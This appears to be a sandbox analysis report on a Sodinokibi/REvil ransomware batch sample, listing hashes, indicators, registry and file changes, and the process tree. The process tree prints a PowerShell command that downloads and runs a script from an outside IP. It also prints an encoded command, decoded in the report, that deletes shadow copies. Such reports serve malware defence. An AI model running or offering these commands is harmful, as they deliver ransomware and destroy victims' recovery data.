Analysis
  max time kernel: 140s
  max time network: 56s
  platform: windows7_x64
  resource: win7v200430
  submitted: 01-06-2020 02:10

Static task: static1

Behavioral task: behavioral1
  Sample: ef447ab5d2ae0a9d701c838651e09c94.bat
  Resource: win7v200430

Behavioral task: behavioral2
  Sample: ef447ab5d2ae0a9d701c838651e09c94.bat
  Resource: win10v200430
General
  Target: ef447ab5d2ae0a9d701c838651e09c94.bat
  Size: 222B
  MD5: c5368e48c478684dfe98d32e80ae5937
  SHA1: 306390ba49636df25818c32788ed3fe603394007
  SHA256: 80a177482b2efdaad3bf92dd550933e4a859bfc987e2511c301838d687fdfe86
  SHA512: 080141c425524360ce79c56e3de9f7196c4527001ed7c763056876ef2c5dd078a9751f7e3a87a0914928327b218428870e07f979d1c26a29390112142df55fbe
Malware Config
  Extracted: http://185.103.242.78/pastes/ef447ab5d2ae0a9d701c838651e09c94
  Extracted: C:\ak80t6qf0w-readme.txt
    Family: sodinokibi
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/25BA0DA33B40EBC0
    http://decryptor.cc/25BA0DA33B40EBC0
Signatures
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  description                      pid   process
  Token: SeDebugPrivilege          868   powershell.exe
  Token: SeDebugPrivilege          868   powershell.exe
  Token: SeDebugPrivilege          1792  powershell.exe
  Token: SeBackupPrivilege         332   vssvc.exe
  Token: SeRestorePrivilege        332   vssvc.exe
  Token: SeAuditPrivilege          332   vssvc.exe
  Token: SeTakeOwnershipPrivilege  868   powershell.exe
Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow  pid   process
  3     868   powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1a0638w7.bmp" (powershell.exe)
Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
Drops file in Program Files directory (26 IoCs)
  Processes: powershell.exe
  File created: \??\c:\program files\ak80t6qf0w-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\DenyAssert.3gp2 (powershell.exe)
  File opened for modification: \??\c:\program files\MergePop.gif (powershell.exe)
  File opened for modification: \??\c:\program files\ProtectRevoke.xla (powershell.exe)
  File opened for modification: \??\c:\program files\PushPop.MTS (powershell.exe)
  File opened for modification: \??\c:\program files\RegisterGet.mp4 (powershell.exe)
  File opened for modification: \??\c:\program files\UseWait.mpeg (powershell.exe)
  File opened for modification: \??\c:\program files\WatchLimit.jpeg (powershell.exe)
  File created: \??\c:\program files (x86)\ak80t6qf0w-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\InitializeSubmit.vstm (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\ak80t6qf0w-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\NewMount.3gpp (powershell.exe)
  File opened for modification: \??\c:\program files\RedoRestart.asf (powershell.exe)
  File opened for modification: \??\c:\program files\SyncExit.TS (powershell.exe)
  File opened for modification: \??\c:\program files\WatchSync.vb (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\ak80t6qf0w-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\CloseCompare.001 (powershell.exe)
  File opened for modification: \??\c:\program files\ConvertFromCompare.aiff (powershell.exe)
  File opened for modification: \??\c:\program files\MountCopy.docx (powershell.exe)
  File opened for modification: \??\c:\program files\UnblockExpand.dot (powershell.exe)
  File opened for modification: \??\c:\program files\CheckpointNew.pcx (powershell.exe)
  File opened for modification: \??\c:\program files\ClearUnlock.snd (powershell.exe)
  File opened for modification: \??\c:\program files\DebugConnect.shtml (powershell.exe)
  File opened for modification: \??\c:\program files\RenameSplit.gif (powershell.exe)
  File opened for modification: \??\c:\program files\SkipExpand.ttc (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ak80t6qf0w-readme.txt (powershell.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  pid  process
  868  powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  description                       pid   process         target process
  PID 1520 wrote to memory of 868   1520  cmd.exe         powershell.exe
  PID 868 wrote to memory of 1792   868   powershell.exe  powershell.exe
  PID 868 wrote to memory of 1792   868   powershell.exe  powershell.exe
  PID 868 wrote to memory of 1792   868   powershell.exe  powershell.exe
  PID 868 wrote to memory of 1792   868   powershell.exe  powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  pid   process
  868   powershell.exe
  1792  powershell.exe
  (all 77 rows are one of these two entries; PID 1792 accounts for two of them, PID 868 for the rest)
Family: Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Processes
  C:\Windows\system32\cmd.exe (PID 1520)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\ef447ab5d2ae0a9d701c838651e09c94.bat"
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 868)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ef447ab5d2ae0a9d701c838651e09c94');Invoke-NAGUEMUGEPDJGKM;Start-Sleep -s 10000"
      - Suspicious use of AdjustPrivilegeToken
      - Blacklisted process makes network request
      - Sets desktop wallpaper using registry
      - Drops file in Program Files directory
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
      - Suspicious behavior: EnumeratesProcesses
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1792)
        Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which is the shadow-copy deletion that triggers the vssvc.exe activity recorded below)
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\vssvc.exe (PID 332)
    Command line: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service